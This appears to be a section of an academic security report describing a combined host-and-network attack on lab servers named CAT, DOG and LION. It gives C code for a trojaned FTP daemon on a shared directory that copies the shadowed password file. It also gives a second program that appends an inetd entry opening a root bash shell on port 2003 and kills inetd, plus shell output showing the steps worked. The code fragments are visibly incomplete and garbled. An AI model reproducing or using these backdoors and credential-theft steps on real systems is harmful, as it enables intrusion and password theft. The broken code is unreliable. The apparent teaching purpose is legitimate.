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5.3 Combined

The diagram we had for the Internal security is changed slightly and the complications introduced by the change are explained. Figure 5.4 has the changes.

Figure 5.4: Configuration of our network

The router between ME and the servers CAT, DOG and LION prevents the attack we described under Host Security as it blocks NFS traffic. Our attack is directed at LION, which is connected to DOG in the same way that CAT is. The difference here is that we do not have a user account on LION. Our attack will therefore take the form of a host security break-in, followed by a network security type of attack by exploiting/abusing the trust relationship that exists between the servers.

Using the exim attack described in our section on misconfigured software, we obtain root access on CAT. In theory, this means we should be able to obtain root access on both DOG and CAT. Because we have a user account on DOG, the attack is easy and has been discussed already. We have therefore satisfied the first requirement of our attack, a host security attack. Our network security attack requirement is not as easy to fulfil.

The '/usr/local' directory is shared between all the servers. The first thing to find is a service on LION that uses this or a part of the shared directory tree. From an investigation into the matter, the FTP daemon is found to be such a service. It resides in '/usr/local/sbin/in.ftpd'. If we can replace the legitimate file with a script or program that does what we want, we can gain entry into LION. Such a program could copy the [shadowed] password file from its inaccessible location to a file in '/usr/local'. An example of such a program is shown below:

void main(void)

{ system("cp /etc/security/passwd /usr/local/pass");


All we would then need to do is, from any host :

[siviwe@lucifer siviwe]$ ftp lion

Connected to

421 Service not available, remote server has closed connection

ftp> exit

[siviwe@lucifer siviwe]$

Now, from either DOG or CAT, check if it worked:

g94k6913@dog$ ls -l /usr/local/pass

-rw-r-r-   1 root     root         31224 Oct 30 02:22 /usr/local/pass

The password file is then run through a password cracker. If the password cracker guesses a password in the file, we have access to LION. Additionally, obtaining root on LION will be as trivial as on DOG and CAT. An easier entrance to the system would be to replace the ftp daemon with the program shown below. It opens a root shell on the cfinger port (2003).

#include <unistd.h>

#include <stdio.h>

void main(void)

  FILE *myfile; // Make adding easier

  if ((myfile = fopen("/etc/inetd.conf","a+")) == NULL) {




"cfinger       stream  tcp     nowait  root    /usr/local/bin/bash       bash -i\n");


  system("kill -9 `ps -auwx | grep inetd | grep -v grep | awk \'{print $2}\'`");



After one of these two methods of entry, we also have root on LION and our attack is complete.

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Shaun Bangay